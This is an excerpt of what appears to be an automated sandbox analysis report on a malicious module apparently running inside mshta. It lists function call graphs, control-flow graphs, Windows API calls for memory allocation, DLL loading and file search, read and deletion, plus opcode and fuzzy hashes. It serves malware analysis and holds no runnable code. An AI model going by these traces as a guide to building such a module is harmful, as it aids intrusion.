LdrInitializeThunk 97320->97325 97323->97318 97324->97320 97325->97315 97111 2f385c7 97112 2f38581 97111->97112 97112->97111 97114 2f38587 97112->97114 97115 2f36d40 LdrInitializeThunk LdrInitializeThunk 97112->97115 97115->97112 97326 2f45e00 97327 2f45e5a 97326->97327 97329 2f45e67 97327->97329 97330 2f43830 97327->97330 97331 2f4b140 NtAllocateVirtualMemory 97330->97331 97333 2f4386e 97331->97333 97332 2f4396e 97332->97329 97333->97332 97334 2f34310 LdrLoadDll 97333->97334 97336 2f438ae 97334->97336 97335 2f438f0 Sleep 97335->97336 97336->97332 97336->97335 97337 2f48580 97338 2f4860c 97337->97338 97339 2f485a8 97337->97339 97342 3882ee0 LdrInitializeThunk 97338->97342 97340 2f4863d 97342->97340 97343 2f48f80 97344 2f49027 97343->97344 97346 2f48fab 97343->97346 97345 2f4903d NtReadFile 97344->97345 97347 2f48700 97348 2f4871a 97347->97348 97351 3882df0 LdrInitializeThunk 97348->97351 97349 2f48742 97351->97349

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 02F29B10 Relevance: 34.2, Strings: 27, Instructions: 482COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 26 2f29b10-2f29ede 27 2f29ee8-2f29eef 26->27 28 2f29ef1-2f29f24 27->28 29 2f29f26-2f29f2d 27->29 28->27 30 2f29f54-2f29f5e 29->30 31 2f29f2f-2f29f52 29->31 32 2f29f6f-2f29f7b 30->32 31->29 33 2f29f91-2f29f9b 32->33 34 2f29f7d-2f29f8f 32->34 36 2f29fac-2f29fb5 33->36 34->32 37 2f29fb7-2f29fc7 36->37 38 2f29fc9-2f29fd3 36->38 37->36 40 2f29fe4-2f29fed 38->40 41 2f2a003-2f2a00d 40->41 42 2f29fef-2f2a001 40->42 44 2f2a01e-2f2a02a 41->44 42->40 45 2f2a048-2f2a052 44->45 46 2f2a02c-2f2a038 44->46 49 2f2a063-2f2a06c 45->49 47 2f2a046 46->47 48 2f2a03a-2f2a040 46->48 47->44 48->47 51 2f2a06e-2f2a07a 49->51 52 2f2a07c-2f2a08d 49->52 51->49 54 2f2a09e-2f2a0aa 52->54 55 2f2a0c1-2f2a0cb 54->55 56 2f2a0ac-2f2a0bf 54->56 58 2f2a0dc-2f2a0e8 55->58 56->54 59 2f2a0ea-2f2a0f9 58->59 60 2f2a0fb-2f2a113 58->60 59->58 61 2f2a124-2f2a12d 60->61 63 2f2a13b-2f2a144 61->63 64 2f2a12f-2f2a139 61->64 66 2f2a2aa-2f2a2b4 63->66 67 2f2a14a-2f2a151 63->67 64->61 70 2f2a2c5-2f2a2ce 66->70 68 2f2a153-2f2a186 67->68 69 2f2a188-2f2a18b 67->69 68->67 71 2f2a191-2f2a198 69->71 72 2f2a2d0-2f2a2e2 70->72 73 2f2a2e4-2f2a2eb 70->73 74 2f2a19a-2f2a1b0 71->74 75 2f2a1bd-2f2a1c7 71->75 72->70 77 2f2a2f1-2f2a2fb 73->77 78 2f2a469-2f2a470 73->78 79 2f2a1b2-2f2a1b8 74->79 80 2f2a1bb 74->80 83 2f2a1d8-2f2a1e4 75->83 84 2f2a30c-2f2a318 77->84 81 2f2a472-2f2a482 78->81 82 2f2a4a9-2f2a4b0 78->82 79->80 80->71 87 2f2a493-2f2a4a7 81->87 88 2f2a484-2f2a48d 81->88 89 2f2a4e2-2f2a4ec 82->89 90 2f2a4b2-2f2a4e0 82->90 91 2f2a1e6-2f2a1f3 83->91 92 2f2a1f5-2f2a204 83->92 85 2f2a325-2f2a32f 84->85 86 2f2a31a-2f2a323 84->86 95 2f2a331-2f2a34c 85->95 96 2f2a368-2f2a36f 85->96 86->84 87->78 88->87 90->82 91->83 93 2f2a206 92->93 94 2f2a20b-2f2a212 92->94 93->66 99 2f2a214-2f2a243 94->99 100 2f2a245-2f2a24f 94->100 101 2f2a353-2f2a355 95->101 102 2f2a34e-2f2a352 95->102 103 2f2a371-2f2a394 96->103 104 2f2a396-2f2a39d 96->104 99->94 105 2f2a251-2f2a270 100->105 106 2f2a29b-2f2a2a5 100->106 107 2f2a366 101->107 108 2f2a357-2f2a360 101->108 102->101 103->96 109 2f2a3ca call 2f4ae30 104->109 110 2f2a39f-2f2a3c8 104->110 111 2f2a282-2f2a293 105->111 112 2f2a272-2f2a280 105->112 106->63 107->85 108->107 115 2f2a3cf-2f2a3d9 109->115 110->104 114 2f2a299 111->114 112->114 114->100 116 2f2a3db-2f2a3fa 115->116 117 2f2a40d-2f2a411 115->117 118 2f2a40b 116->118 119 2f2a3fc-2f2a405 116->119 120 2f2a432-2f2a43c 117->120 121 2f2a413-2f2a430 117->121 118->115 119->118 122 2f2a44d-2f2a459 120->122 121->117 122->78 123 2f2a45b-2f2a467 122->123 123->122
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !$'x$+K$2l$7R$9$;$A$B$B_$Fe$L$L}$M/$PK$W$X6$XZ$[J$`$b}$c]$g$gJFe${b$~y$V
                                                                                                                                                                                                                                                • API String ID: 0-2671176807
                                                                                                                                                                                                                                                • Opcode ID: d998aaa6e5b9bf86649a4d0fc7b502850b9c9dc8653dfc566b95174ca8572816
                                                                                                                                                                                                                                                • Instruction ID: a56e7bb4b4cfc55432775b1bea699f7c9990e802254b3dd39d51b1095d3cdc22
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d998aaa6e5b9bf86649a4d0fc7b502850b9c9dc8653dfc566b95174ca8572816
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7429FB0E05629CBEB64CF44CD94BD9BBB2BB45308F1081D9D20D6B290DBB95AC8CF55
                                                                                                                                                                                                                                                Function 02F3C390 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F3C471
                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02F3C4AE
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(?), ref: 02F3C4B9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                • Opcode ID: a680eb3841f0e9fac18bf206ee4c7027eb8b63656caed27519784e8d5f45afce
                                                                                                                                                                                                                                                • Instruction ID: eb0bfc14aba10b8e4536ef69a3ff0dbb4e79f45838507524b4f06fa70d76876b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a680eb3841f0e9fac18bf206ee4c7027eb8b63656caed27519784e8d5f45afce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 513196719003097BDB21DBA0CD85FFF777D9F44794F144459FA08A7181DBB4AA848BA4
                                                                                                                                                                                                                                                Function 02F49280 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(02F31B9E,?,02F47D3E,00000000,00000004,00003000,?,?,?,?,?,02F47D3E,02F31B9E,02F47D3E,E8565751,02F31B9E), ref: 02F49348
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                • String ID: QWV
                                                                                                                                                                                                                                                • API String ID: 2167126740-1719063439
                                                                                                                                                                                                                                                • Opcode ID: fdc5077bbbfd4eba5edcaab04226d6d8d96cb4e6f903cdcba52ef66698f93ba2
                                                                                                                                                                                                                                                • Instruction ID: 6b49004d4cef6305c6bb5f0cc0fa14613c6e54757383c763be30e294a88a0711
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdc5077bbbfd4eba5edcaab04226d6d8d96cb4e6f903cdcba52ef66698f93ba2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B212F75A00209ABDB10DF98DC41EEFB7B9FF89740F108509FD58A7240DB70A9118BA5
                                                                                                                                                                                                                                                Function 02F48E10 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F48F0B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: ee4566309bb0c039c4e9f792d5c38534fcb369479528be23946340e28e16567f
                                                                                                                                                                                                                                                • Instruction ID: b3536d61bfded3fe2e387d11e2d0b802a59f781f65e7f502015ff691e31552d0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee4566309bb0c039c4e9f792d5c38534fcb369479528be23946340e28e16567f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0431CA75A00208AFDB14DF98D880EDEB7F9EF8D354F108609F918A7340D770A841CBA4
                                                                                                                                                                                                                                                Function 02F48F80 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F49066
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                • Opcode ID: 162a3e1e8e03b3c8b35c72b2edbd4e0f31eaa0561688e302af6cf82a977e8f1f
                                                                                                                                                                                                                                                • Instruction ID: d81f917ec73bfa1886e60db241ad29dd9d759e278f3625bf064a92c92173f840
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 162a3e1e8e03b3c8b35c72b2edbd4e0f31eaa0561688e302af6cf82a977e8f1f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C31D975A00608ABDB14DF98D881EEFB7F9EF89754F108209F918A7240DB70A9518BA5
                                                                                                                                                                                                                                                Function 02F49070 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                                                                • Opcode ID: e790bde1dedf81e8befb819c3047ab98e8e37d91b0426183d763296c5cdb5dad
                                                                                                                                                                                                                                                • Instruction ID: 5f79a48b2a2df5e1677f3a8e616ec5dc8bc5663541715b42f667f3d41d90c79f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e790bde1dedf81e8befb819c3047ab98e8e37d91b0426183d763296c5cdb5dad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A811CA71500608BAD720EB64CC41FEFB7ADEF85754F108509FA58A7240EBB17515CBE5
                                                                                                                                                                                                                                                Function 02F49110 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F49144
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                                                                                                                                • Opcode ID: e9cdab559d7ec7bf5155d117a313f9e6409ac217aa759235a9e10d3125478c55
                                                                                                                                                                                                                                                • Instruction ID: 9b1bb9a91b7c40d855f10b3b7ac7e4d04453a981de68b43a609bf9150be2e39c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9cdab559d7ec7bf5155d117a313f9e6409ac217aa759235a9e10d3125478c55
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8E086312402147BD120EB59DC01FDB779DDFC6760F008015FA4DA7241CA71790587F4
                                                                                                                                                                                                                                                Function 03884340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 7a0dc1a5a40afbafdfbe41607640b553e6daf10ac0b8d65b59b05e0f2d67432f
                                                                                                                                                                                                                                                • Instruction ID: 19e5261c85b1486048b72f5b89aa785ad2cd13cca9127b93551e36e6c1d2ec4d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a0dc1a5a40afbafdfbe41607640b553e6daf10ac0b8d65b59b05e0f2d67432f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B90023160580516A540B1984C84546404597E1301B69C052E142C554C8B148A5A5366
                                                                                                                                                                                                                                                Function 03884650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 16b06453236523829cb72476ee73f563d92398dcb1d0674221cdb2d6c36383a8
                                                                                                                                                                                                                                                • Instruction ID: 68dcae721359c8d42365ee171a57110785b7b8c885c5f8566701410145e8a8ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16b06453236523829cb72476ee73f563d92398dcb1d0674221cdb2d6c36383a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53900261601505465540B1984C04406604597E23013A9C156A155C560C87188959926E
                                                                                                                                                                                                                                                Function 03882BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 36affb0677102594f73cdec3dd3238e5f25fa69ffd23f61bd1ab682be2d9913b
                                                                                                                                                                                                                                                • Instruction ID: a275ddf1bf5dc22e51931cf423c9ad421419a45e3177628bf79de0df21e89815
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36affb0677102594f73cdec3dd3238e5f25fa69ffd23f61bd1ab682be2d9913b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E990023160540D06E550B1984814746004587D1301F69C052A102C654D87558B5976A6
                                                                                                                                                                                                                                                Function 03882BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 600f9e68c1ea5440bebcf475d0f73bec980b75fce24392144b008a8eca3d42f7
                                                                                                                                                                                                                                                • Instruction ID: da0eeec51a4125a0552e51de76356dec9bd5e4b090f28b8e1b7ad079e960bf18
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 600f9e68c1ea5440bebcf475d0f73bec980b75fce24392144b008a8eca3d42f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A90023120544D46E540B1984804A46005587D1305F69C052A106C694D97258E59B666
                                                                                                                                                                                                                                                Function 03882BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: f192a52f07af1e62ab639a6bc4a0d4e16db2a574b9fa099740f397d6a9a70091
                                                                                                                                                                                                                                                • Instruction ID: 97d9a3ce22a0c7d92cb794a83411c1d3350f015d48f28e946e17083d2bcf343a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f192a52f07af1e62ab639a6bc4a0d4e16db2a574b9fa099740f397d6a9a70091
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9690023120140D06E580B198480464A004587D2301FA9C056A102D654DCB158B5D77A6
                                                                                                                                                                                                                                                Function 03882B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 6572daf371c8a581818912f29e26fc3f166ea18de8b1efab417407c2d88ae179
                                                                                                                                                                                                                                                • Instruction ID: b3e4fffde6fe7b85938b00e2acfb43f89456ebaaa423749f4c3747a901bcb5a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6572daf371c8a581818912f29e26fc3f166ea18de8b1efab417407c2d88ae179
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68900261202405075505B1984814616404A87E1201B69C062E201C590DC6258995612A
                                                                                                                                                                                                                                                Function 03882AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 41a4f14a0a6cba0e8f3e72bcef84f3fe47809a11dc0e96c4d7e8f74a3fc78bad
                                                                                                                                                                                                                                                • Instruction ID: 2bb7818f778170ea65a4c91ab18bdecd34d9e9fb78ebf7c8f704f60232c07261
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41a4f14a0a6cba0e8f3e72bcef84f3fe47809a11dc0e96c4d7e8f74a3fc78bad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5900225211405071505F5980B04507008687D6351369C062F201D550CD72189655126
                                                                                                                                                                                                                                                Function 03882AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 1fd6382ff58139d08e100d33c273d542eab42be5f3fcb1b004fc772ef918e2cd
                                                                                                                                                                                                                                                • Instruction ID: 1dc2a3e11e818c6d3e8fa83d7cff075e60942350a2877ae9e8db76c750e66116
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fd6382ff58139d08e100d33c273d542eab42be5f3fcb1b004fc772ef918e2cd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E900225221405061545F5980A0450B048597D73513A9C056F241E590CC72189695326
                                                                                                                                                                                                                                                Function 03882FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
